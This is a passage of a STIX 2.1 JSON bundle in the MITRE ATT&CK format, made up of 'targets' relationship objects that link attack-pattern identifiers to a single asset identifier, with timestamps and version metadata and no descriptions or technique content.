"identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cd6c40aa-3896-4b64-9341-8826d5b007a4", "created": "2024-07-01T10:37:15.820426", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820428", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7f248b40-6ab6-4af7-be6f-a8554070ad8a", "created": "2024-07-01T10:37:15.820436", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820438", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--282523cc-a19c-49f6-b363-7221c69f7f95", "created": "2024-07-01T10:37:15.820446", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820448", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--49df7cbf-2e4a-41de-b191-a20dec44cc18", "created": "2024-07-01T10:37:15.820456", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820459", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b061b83f-da5b-48a8-a274-6730dcb055a0", "created": "2024-07-01T10:37:15.820466", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820469", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cc89ecbd-3d33-4a41-bcca-001e702d18fd", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--364dbf11-b837-4c91-a151-c8122b23b1d1", "created": "2024-07-01T10:37:15.820476", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820479", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b21dab9e-775c-4e11-885f-24c0fdb78c75", "created": "2024-07-01T10:37:15.820487", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820489", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ce4b7013-640e-48a9-b501-d0025a95f4bf", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d8a4ea8e-c922-4653-8bc6-c5c08904c438", "created": "2024-07-01T10:37:15.820497", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820499", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--22e6f471-a65a-4d1d-90c9-4985365c480e", "created": "2024-07-01T10:37:15.820507", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820509", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--edf0ab06-4f1b-407c-866d-c70b0b6b89d4", "created": "2024-07-01T10:37:15.820517", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820519", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4319d1ee-9dce-481d-8e36-72fee19f11e8", "created": "2024-07-01T10:37:15.820527", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820529", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d273434a-448e-4598-8e14-607f4a0d5e27", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fac26e36-ba67-4847-b302-697dcfecbca3", "created": "2024-07-01T10:37:15.820537", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820539", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e77285b7-46c8-4a1e-a919-959dc71b1ab1", "created": "2024-07-01T10:37:15.820547", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820549", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d2c4e5ea-dbdf-4113-805a-b1e2a337fb33", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8a1bcbf6-88a3-4259-b393-508b95605211", "created": "2024-07-01T10:37:15.820557", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820560", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d336b553-5da9-46ca-98a8-0b23f49fb447", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c8e052cb-8cb1-4a87-9dd4-08c419fef0b4", "created": "2024-07-01T10:37:15.820567", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820569", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d40239b3-05ff-46d8-9bdd-b46d13463ef9", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--62c25d13-4e49-44a8-9d62-773a26fc7910", "created": "2024-07-01T10:37:15.820577", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820579", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d456de47-a16f-4e46-8980-e67478a12dcb", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--77666b37-aed0-4c04-b317-bf1d1c4ff552", "created": "2024-07-01T10:37:15.820587", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820590", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--02e8fc5c-4a06-4339-b5bb-202856aae47e", "created": "2024-07-01T10:37:15.820598", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820600", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d467bc38-284b-4a00-96ac-125f447799fc", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2916ee77-2fb0-4e0a-91cf-8bdcabbdc76a", "created": "2024-07-01T10:37:15.820608", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820610", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--40c7108b-dd9d-4409-93af-c2ab1bc6cc0b", "created": "2024-07-01T10:37:15.820618", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820620", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d4dc46e3-5ba5-45b9-8204-010867cacfcb", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5b4ea99d-835b-4b70-b284-5786d00971f8", "created": "2024-07-01T10:37:15.820628", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820630", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9206af3f-9153-416c-936f-06e42246dc22", "created": "2024-07-01T10:37:15.820638", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820640", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d511a6f6-4a33-41d5-bc95-c343875d1377", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8240f432-ef9e-4fea-8bc6-edc2b748b21a", "created": "2024-07-01T10:37:15.820649", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820651", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--49364e45-0581-4aba-bf13-472c4721e383", "created": "2024-07-01T10:37:15.820659", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820661", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--973d7994-fa84-407c-bc3e-8deaf4147967", "created": "2024-07-01T10:37:15.820669", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820672", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--28c971a0-8ff2-480c-aeaf-01f13b7e5135", "created": "2024-07-01T10:37:15.820680", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820682", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--da051493-ae9c-4b1b-9760-c009c46c9b56", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6589286f-fece-4f48-b0e5-673024ea054d", "created": "2024-07-01T10:37:15.820690", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820692", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--dc31fe1e-d722-49da-8f5f-92c7b5aff534", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--51ee32db-c8c2-4a2e-ae4f-56eba183b6c2", "created": "2024-07-01T10:37:15.820700", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820702", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1727ab4e-04e3-4761-bf49-516565de3361", "created": "2024-07-01T10:37:15.820710", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820713", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--dd43c543-bb85-4a6f-aa6e-160d90d06a49", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5d08c4e0-b7b1-445f-85c7-37f327f6c944", "created": "2024-07-01T10:37:15.820721", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820723", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--13bb06ed-aa17-49d3-b31c-488c892b4c96", "created": "2024-07-01T10:37:15.820731", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820733", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6ae3c74c-f890-4c8c-a81c-bf583748689d", "created": "2024-07-01T10:37:15.820741", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820743", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f7324adf-4ac0-4cdd-becf-2c8562098dc7", "created": "2024-07-01T10:37:15.820751", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820753", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d3edc80d-7051-4af7-b96f-2e8cd8488dc7", "created": "2024-07-01T10:37:15.820761", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820763", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e0033c16-a07e-48aa-8204-7c3ca669998c", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f8525c5e-117c-4151-90e4-9e3f9beaa1ab", "created": "2024-07-01T10:37:15.820772", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820774", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--52cd021d-ff35-4083-bf85-66a3e931053c", "created": "2024-07-01T10:37:15.820782", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820784", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--86f62bdf-f3fc-480d-8822-40f47d633e46", "created": "2024-07-01T10:37:15.820792", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820794", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--27bb00f5-2a28-41b7-b0f1-fccae914c538", "created": "2024-07-01T10:37:15.820802", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820804", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5e5a0ec0-f6b3-4765-a258-1d8df99219f0", "created": "2024-07-01T10:37:15.820812", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820814", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e49ee9d2-0d98-44ef-85e5-5d3100065744", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9ccbc108-a619-4b84-9b3c-36f2f2eaf281", "created": "2024-07-01T10:37:15.820823", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820825", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e4dc8c01-417f-458d-9ee0-bb0617c1b391", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2ce7823d-46ab-4e25-bcca-3b18bf155487", "created": "2024-07-01T10:37:15.820833", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820835", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e624264c-033a-424d-9fd7-fc9c3bbdb03e", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": 